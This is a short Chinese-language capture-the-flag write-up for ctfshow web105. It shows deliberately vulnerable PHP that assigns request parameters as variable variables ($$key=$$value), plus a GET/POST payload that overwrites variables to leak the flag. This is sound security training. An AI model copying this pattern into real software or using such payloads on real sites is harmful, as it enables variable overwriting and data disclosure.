<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:34:07
*/
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}
$$key=$$value;
}foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}
$$key=$$value;
}
if(!($_POST['flag']==$flag)){
die($error);
}
echo "your are good".$flag."\n";
die($suces);
?>
我们的利用点在
if(!($_POST['flag']==$flag)){
die($error);
}
我们将error的值变为flag的值即可。但又要绕过前两个if die。
因此payload如下:
GET: ?suces=flag POST: error=suces
标签:变量,die,web105,value,flag,ctfshow,key,error,POST From: https://www.cnblogs.com/meng-han/p/16800586.html